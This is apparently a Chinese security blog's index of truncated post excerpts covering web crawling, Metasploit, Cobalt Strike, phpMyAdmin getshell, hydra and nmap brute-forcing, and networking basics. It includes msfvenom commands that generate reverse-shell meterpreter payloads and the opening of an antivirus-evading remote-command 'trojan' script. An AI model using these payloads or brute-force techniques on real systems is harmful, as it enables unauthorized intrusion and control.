weixin_42035825的博客

原创 爬虫的基础

写在前面爬，爬虫就是通过请求一个url，然后给你返回一个html的页面（源代码），然后通过一些方法来读取html标签里面的内容。这里我就不给真实的案例了，授人以鱼不如授人以渔，我只是希望大家能够理解其中的原理和方法，然后自己能够写一写import requestsfrom lxml import etreedomainurl="你想要爬取的网址"response = requests....

原创 TCP编程（类似于木马脚本）

首先，我们这里要分为两部分，一个是服务端，一个是客户端；多的就不解释了，目的就是要放一个脚本在目标机上执行我们传给它的命令，并返回结果（而且本身是免杀的）；好，废话不多说，上代码；服务端（用于接收执行之后的结果和屏幕的截图）#没有相关模块的包请各位自行导入一下；pip install 包名#环境是3.7的import socketfrom PIL import ImageGrab,Ima...

原创 Cobalt Strike与MSF的联动

cs的会话---->msf的会话注意：必须安装java我这里使用的是cs4.0版本的，所以后面的有些东西会和以前的有些差异，但并不影响。进入目录，启动cs的服务端，命令格式：./teamserver ip 密码；客户端有两种一种是windows版，一种是linux版。这里采用linux版本，但都必须是在java环境里面；启动客户端：host：服务器端的ip；port：服务器...

原创 利用msf框架生成常见的木马

常用木马安卓appmsfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apkLinux：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elfMac:msfvenom -p osx/x...

原创 简单的利用msf渗透框架

实战案例：主机扫描：收集信息是渗透测试中的第一步，它的重要性就不必多说了，其主要目标是尽可能多地发现有关目标机器的信息。获取的信息越多，渗透的概率就越大。该步骤的主要关注点是目标机器IP地址，可用服务，开放端口等。使用msf的辅助模块进行端口扫描：辅助模块是Metasploit的内置模块，首先利用search命令搜索有那些可用端口模块：msf5 > search portsca...

原创 phpmyadmin getshell到提权

环境准备靶机：win7 32 位。环境：php：5.45MYsql：5.5.53 Apache：2.43开始试验使用nmap扫描目标机端口及服务情况。nmap -sV ipa.发现该目标机的3306端口开放，使用namp自带的mysql弱口令脚本进行爆破；nmap -p 3306 --script=mysql-brute ipb.也可以通过目录爆破等方法找到phpmyadm...

原创 hydra暴力破解的基本使用方法

常见参数-R：继续从上一次进度接着破解-S：大写，采用SSL链接-s ：小写，可通过这个参数指定非默认端口-l ：指定破解的用户，对特定用户破解-L ：指定用户名字典-p ：小写，指定密码破解，少用，一般是采用密码字典-P ：大写，指定密码字典-e ：可选选项，n：空密码试探，s：使用指定用户和密码试探-C ：使用冒号分割格式，例如“登录名:密码”来代替 -L/-P...

转载 nmap的基本用法

原创 PXE网络装机服务搭建

一、 实验目的实现自动装机二、 实验内容基于PXE引导启动客户端操作系统三、 实验环境与准备准备两台Linux虚拟机，网卡设置为仅主机模式，并在同一网段内四、 实验分析与设计思路首先需要安装基于UDP协议的TFTP服务端，来进行后期的简单文件的网络传输，在TFTP根路径导入需要提供给客户端的引导文件和内核文件，以及PXE引导程序文件pxelinux.0（由syslinux程序提供）...

原创 VIM的基本操作

VIM的三种工作模式光标的移动操作：快速复制、粘贴、删除文件内容查找撤销编辑保温文件及退出编辑器文件内容替换

原创 搜索引擎收集信息

铺垫就不说了；直接上一些搜索语法吧；搜索引擎用百度还是谷歌随个人方便，个人推荐还是用谷歌。intitle，allintile:搜索标题中的含有的关键字，这个最好是只有一个“参数”，多个“参数”最好使用alltitle例如：intext:搜索正文中出现了关键字的网页，例如：inurl，allinurl:搜索url含有关键的网页，比如：site：搜索指定的网站，例如：...

原创 简述OSI七层模型

简述OSI模型的使用互联网其实就是利用一系列不同作用的协议（标准）来实现通信的。为了让别人能够充分的理解就划分出了七层OSI模型，实际上这个模型是不存在的。应用层（进程/应用层）：计算机与用户交互的界面，当需要马上访问网路的时，这一层才会发挥作用，是实际应用程序之间的接口；协议部分有：Telnet（远程管理协议） SNMPFTP （文件传输协议） SSH（...

原创 IP地址简介

IP地址相信大家都不陌生，目前有两种：一种是IPv4，一种是IPv6；目前最普遍的就是IPv4。我简单的介绍一下IPv4的编址方法；IP地址由32位二进制数组成，这些位被划分为4个字节，中间用“.”号隔开，每8位用十进制数表示，分为网络地址和主机地址两个部分。例如：192.168.10.1二进制表示为：11000000.10101000.00001010.00000001 二进制数（只有...

原创 ACL（访问控制列表）

ACL全称：访问控制列表（access control list）；通俗的可以理解为规则集合。它是在三层数据包进行过滤。ACL分为两种：标准ACL（standard）：检查原地址；通常是允许或者拒绝完整的协议。（一般是做在离目标端口最近的端口，方向为out）；编号：1-99扩展ACL（extended）：检查原地址和目的地址，通常是允许或者拒绝某个特定的协议（通常在离源最远的端口，方向为in...

原创 Linux磁盘分配

1.磁盘的组成圆形的磁盘(主要记录数据的部分)；机械手臂，与在机械手臂上的磁盘读取头(可擦写磁盘盘上的数据)；主轴马达，可以转动磁盘盘，让机械手臂的读取头在磁盘盘上读写数据。扇区(Sector)为最小的物理储存单位，每个扇区为 512 bytes； 将扇区组成一个圆，那就是磁柱(Cylinder)，磁柱是分割槽(partition)的最小单位；第一个扇区最重要，里面有：主引导区(Mas...